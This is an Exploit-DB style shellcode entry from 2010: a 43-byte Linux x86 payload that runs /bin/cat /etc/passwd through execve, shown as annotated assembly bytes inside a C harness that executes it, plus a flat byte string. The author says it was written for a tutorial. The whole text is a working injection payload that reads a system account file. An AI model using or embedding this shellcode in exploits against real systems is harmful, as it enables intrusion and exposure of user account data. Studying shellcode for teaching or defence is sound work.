# Title: Linux  bin/cat /etc/passwd 43 bytes
#Date  :02/09/2010
#EDB-ID: 
# CVE-ID: ()
# OSVDB-ID: ()
#Version :Shellcode
# Author : fb1h2s
#Tested  : linux\86
# Download Exploit Code

 
/*
 well.... I wrote this one for a tutorial/paper for exploitdb
*/


#include <stdio.h>

const char shellcode[]="\x31\xc0" // xorl    %eax,%eax 
            "\x99"          // cdq
            "\x52"          // push edx 
            "\x68\x2f\x63\x61\x74"  // push dword 0x7461632f
            "\x68\x2f\x62\x69\x6e"  // push dword 0x6e69622f
            "\x89\xe3"      // mov ebx,esp  
            "\x52"          // push edx 
            "\x68\x73\x73\x77\x64"  // push dword 0x64777373 
            "\x68\x2f\x2f\x70\x61"  // push dword 0x61702f2f 
            "\x68\x2f\x65\x74\x63"  // push dword 0x6374652f
            "\x89\xe1"      // mov ecx,esp  
            "\xb0\x0b"      // mov  $0xb,%al 
            "\x52"          // push edx
            "\x51"          // push ecx
            "\x53"          // push ebx
            "\x89\xe1"      // mov ecx,esp  
            "\xcd\x80" ;        // int 80h   

 int main()
 {
            (*(void (*)()) shellcode)();

   return 0;
 }


/*
shellcode[]="\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64"             "\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";
*/